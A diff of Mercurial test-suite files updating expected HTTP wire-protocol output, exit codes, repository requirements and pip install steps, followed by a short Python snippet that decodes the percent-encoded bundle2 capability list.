- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
sending heads command
s> setsockopt(6, 1, 1) -> None (?)
s> POST /api/exp-http-v2-0003/ro/heads HTTP/1.1\r\n
@@ -437,7 +442,7 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-0.1\r\n
- s> Content-Length: 503\r\n
+ s> Content-Length: 484\r\n
s> \r\n
s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
@@ -474,7 +479,7 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-0.1\r\n
- s> Content-Length: 503\r\n
+ s> Content-Length: 484\r\n
s> \r\n
real URL is http://$LOCALIP:$HGPORT/redirected (glob)
s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
@@ -745,7 +750,7 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-0.1\r\n
- s> Content-Length: 503\r\n
+ s> Content-Length: 484\r\n
s> \r\n
real URL is http://$LOCALIP:$HGPORT/redirected (glob)
s> batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
--- a/tests/test-http.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-http.t Tue Apr 20 11:01:06 2021 -0400
@@ -29,7 +29,8 @@
#if no-reposimplestore
$ hg clone --stream http://localhost:$HGPORT/ copy 2>&1
streaming all changes
- 9 files to transfer, 715 bytes of data
+ 9 files to transfer, 715 bytes of data (no-zstd !)
+ 9 files to transfer, 717 bytes of data (zstd !)
transferred * bytes in * seconds (*/sec) (glob)
updating to branch default
4 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -348,20 +349,20 @@
list of changesets:
7f4e523d01f2cc3765ac8934da3d14db775ff872
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
sending unbundle command
- sending 1040 bytes
+ sending 1023 bytes
devel-peer-request: POST http://localhost:$HGPORT2/?cmd=unbundle
- devel-peer-request: Content-length 1040
+ devel-peer-request: Content-length 1023
devel-peer-request: Content-type application/mercurial-0.1
devel-peer-request: Vary X-HgArg-1,X-HgProto-1
devel-peer-request: X-hgproto-1 0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull
devel-peer-request: 16 bytes of commands arguments in headers
- devel-peer-request: 1040 bytes of data
+ devel-peer-request: 1023 bytes of data
devel-peer-request: finished in *.???? seconds (200) (glob)
bundle2-input-bundle: no-transaction
bundle2-input-part: "reply:changegroup" (advisory) (params: 0 advisory) supported
@@ -382,6 +383,7 @@
devel-peer-request: 16 bytes of commands arguments in headers
devel-peer-request: finished in *.???? seconds (200) (glob)
received listkey for "phases": 15 bytes
+ (sent 9 HTTP requests and * bytes; received * bytes in responses) (glob) (?)
$ hg rollback -q
$ sed 's/.*] "/"/' < ../access.log
@@ -503,7 +505,7 @@
requesting all changes
remote: abort: this is an exercise
abort: pull failed on remote
- [255]
+ [100]
$ cat error.log
disable pull-based clones
@@ -515,7 +517,7 @@
remote: abort: server has pull-based clones disabled
abort: pull failed on remote
(remove --pull if specified or upgrade Mercurial)
- [255]
+ [100]
#if no-reposimplestore
... but keep stream clones working
--- a/tests/test-inherit-mode.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-inherit-mode.t Tue Apr 20 11:01:06 2021 -0400
@@ -134,6 +134,8 @@
00660 ../push/.hg/00changelog.i
00770 ../push/.hg/cache/
00660 ../push/.hg/cache/branch2-base
+ 00660 ../push/.hg/cache/rbc-names-v1
+ 00660 ../push/.hg/cache/rbc-revs-v1
00660 ../push/.hg/dirstate
00660 ../push/.hg/requires
00770 ../push/.hg/store/
--- a/tests/test-init.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-init.t Tue Apr 20 11:01:06 2021 -0400
@@ -21,6 +21,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -59,6 +61,8 @@
$ hg --config format.usestore=false init old
$ checknewrepo old
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
testonly-simplestore (reposimplestore !)
sparserevlog
@@ -70,6 +74,8 @@
store created
00changelog.i created
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -83,6 +89,8 @@
00changelog.i created
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -96,6 +104,8 @@
00changelog.i created
dotencode
fncache
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
store
testonly-simplestore (reposimplestore !)
@@ -213,6 +223,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -233,6 +245,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -249,6 +263,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-install.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-install.t Tue Apr 20 11:01:06 2021 -0400
@@ -184,7 +184,7 @@
$ cd $TESTTMP
$ unset PYTHONPATH
-#if py3 ensurepip
+#if py3 ensurepip network-io
$ "$PYTHON" -m venv installenv >> pip.log
Hack: Debian does something a bit different in ensurepip.bootstrap. This makes
@@ -197,8 +197,10 @@
Note: we use this weird path to run pip and hg to avoid platform differences,
since it's bin on most platforms but Scripts on Windows.
- $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log
+ $ ./installenv/*/pip install $TESTDIR/.. >> pip.log
Failed building wheel for mercurial (?)
+ WARNING: You are using pip version *; however, version * is available. (glob) (?)
+ You should consider upgrading via the '$TESTTMP/installenv/bin/python* -m pip install --upgrade pip' command. (glob) (?)
$ ./installenv/*/hg debuginstall || cat pip.log
checking encoding (ascii)...
checking Python executable (*) (glob)
@@ -222,17 +224,17 @@
no problems detected
#endif
-#if virtualenv no-py3
+#if virtualenv no-py3 network-io
Note: --no-site-packages is the default for all versions enabled by hghave
- $ "$PYTHON" -m virtualenv --never-download installenv >> pip.log
+ $ "$PYTHON" -m virtualenv installenv >> pip.log
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?)
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?)
Note: we use this weird path to run pip and hg to avoid platform differences,
since it's bin on most platforms but Scripts on Windows.
- $ ./installenv/*/pip install --no-index $TESTDIR/.. >> pip.log
+ $ ./installenv/*/pip install $TESTDIR/.. >> pip.log
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. (?)
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support (?)
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality. (?)
--- a/tests/test-largefiles-misc.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-largefiles-misc.t Tue Apr 20 11:01:06 2021 -0400
@@ -675,6 +675,7 @@
searching for changes
no changes found
largefiles: no files to upload
+ [1]
check messages when there are files to upload:
--- a/tests/test-largefiles.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-largefiles.t Tue Apr 20 11:01:06 2021 -0400
@@ -1751,7 +1751,7 @@
$ hg rm sub2/large6
$ hg up -r.
abort: outstanding uncommitted merge
- [255]
+ [20]
- revert should be able to revert files introduced in a pending merge
$ hg revert --all -r .
--- a/tests/test-lfconvert.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfconvert.t Tue Apr 20 11:01:06 2021 -0400
@@ -99,6 +99,8 @@
fncache
generaldelta
largefiles
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-lfs-largefiles.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfs-largefiles.t Tue Apr 20 11:01:06 2021 -0400
@@ -293,6 +293,8 @@
fncache
generaldelta
lfs
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-lfs-serve-access.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfs-serve-access.t Tue Apr 20 11:01:06 2021 -0400
@@ -66,7 +66,7 @@
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 400 - (glob)
$ rm -f $TESTTMP/access.log $TESTTMP/errors.log
@@ -110,9 +110,7 @@
bundle2-input-part: "listkeys" (params: 1 mandatory) supported
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
- bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
- bundle2-input-part: total payload size 39
- bundle2-input-bundle: 4 parts total
+ bundle2-input-bundle: 3 parts total
checking for updated bookmarks
updating the branch cache
added 1 changesets with 1 changes to 1 files
@@ -167,7 +165,7 @@
$LOCALIP - - [$LOGDATE$] "POST /missing/objects/batch HTTP/1.1" 404 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /subdir/mount/point/.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /subdir/mount/point/.hg/lfs/objects/f03217a32529a28a42d03b1244fe09b6e0f9fd06d7b966d4d50567be2abe6c0e HTTP/1.1" 200 - (glob)
@@ -313,7 +311,7 @@
$ cat $TESTTMP/access.log
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
@@ -332,7 +330,7 @@
$LOCALIP - - [$LOGDATE$] "PUT /.hg/lfs/objects/b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c HTTP/1.1" 422 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 500 - (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
@@ -483,7 +481,7 @@
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 401 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 401 - (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 200 - (glob)
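
The getbundle hunks above change only one thing, dropping `rev-branch-cache` from the advertised bundle2 capabilities, but that is hard to see because the capability list inside x-hgarg-1 is percent-encoded twice. Decoding it makes the list legible (values abbreviated from the log lines above):

    from urllib.parse import unquote

    bundlecaps = ('HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup'
                  '%253D01%252C02%252C03%250Astream%253Dv2')  # abbreviated
    once = unquote(bundlecaps)   # 'HG20,bundle2=HG20%0Abookmarks%0A...'
    caps = unquote(once.split('bundle2=', 1)[1]).split('\n')
    print(caps)  # ['HG20', 'bookmarks', 'changegroup=01,02,03', 'stream=v2']
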
